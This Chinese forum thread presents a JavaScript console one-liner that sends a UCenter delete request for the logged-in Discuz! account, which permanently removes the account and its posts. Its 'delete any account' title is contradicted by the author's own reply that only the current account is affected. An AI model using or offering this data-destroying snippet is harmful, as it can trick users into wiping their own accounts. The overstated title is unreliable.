古黑论
登陆 / 注册 搜索

USERCENTER

站内搜索引擎

打印 上一主题 下一主题

[网络安全] 删除任意 discuz 论坛的账号漏洞

[复制链接]
跳转到指定楼层
楼主
小执念论坛大牛 发表于 2018-10-21 20:25:39 | 只看该作者 |只看大图 回帖奖励 |倒序浏览 |阅读模式
测试了一下,适用于所有版本的discuz程序,包括最新版!
漏洞说明:

1、执行后,如果显示大于 0 的整数,说明帐号删除成功。
2、删除的是 UCenter 内的帐号,UCenter 会通知 Discuz! 删除用户帐号。
3、通知可能出现延迟,或不成功。因此可能不会立即登出网站
4、如果通知最终成功,该帐号及其所有帖子都会从 Discuz! 中删除。
5、如果通知不成功,帐号登出后也将无法登录。此时可以注册一个新的同名帐号,覆盖原帐号。原帐号信息将被删除,其帖子将无法阅读(但不会删除)。


没有后悔药,自己其他网站的账号请不要胡乱操作!


步骤:F12 --> 在 Console 中输入:


location.href=((d=(await(await fetch("./home.php?mod=spacecp&ac=avatar",{credentials:'include'})).text()).match(/\/\/\S+\/images\/ca\S+&ag/g)[0].replace('images/camera.swf?','?m=user&a=delete&'))&&confirm('真的要[永久]删除你的ID?'))?d:'';

然后按下回车:



 QQ截图20181021201954.png 删除任意 discuz 论坛的账号漏洞

浏览器会提示:


 QQ截图20181021201941.png 删除任意 discuz 论坛的账号漏洞


因为我自己加了 WAF 防御规则,所以这个漏洞在古黑被拦截下来了:


 QQ截图20181021202052.png 删除任意 discuz 论坛的账号漏洞

上一篇:详细讲解何为 DDos 及防御摘要:本文作者:舒肤佳 0x00 / 多年运维,不敌攻击 ...
下一篇:信息安全常识科普摘要:我不是信息安全技术高手,很多很实际的技术细节可能不 ...
回复

使用道具 举报

沙发
 楼主| 小执念论坛大牛 发表于 2018-10-21 20:26:22 | 只看该作者
只能删除当前登陆的账号!
回复 点赞 点踩

使用道具 举报

板凳
站在记忆的边缘 发表于 2018-10-23 19:42:41 来自手机 | 只看该作者
鼎力支持!!
回复 点赞 点踩

使用道具 举报

地板
xjh 发表于 2018-10-24 15:51:11 | 只看该作者
支持
回复 点赞 点踩

使用道具 举报

5#
流星☆坠落 发表于 2018-10-24 19:16:43 来自手机 | 只看该作者
元芳你怎么看?
回复 点赞 点踩

使用道具 举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册  

本版积分规则

关于我们|小黑屋|手机版|Archiver|古黑论

GMT+8, 2019-5-20 21:32 , Processed in 0.182541 second(s), 55 queries .

© 2015-2019 GuHei.Net

Powered by Discuz! X3.4

快速回复 返回列表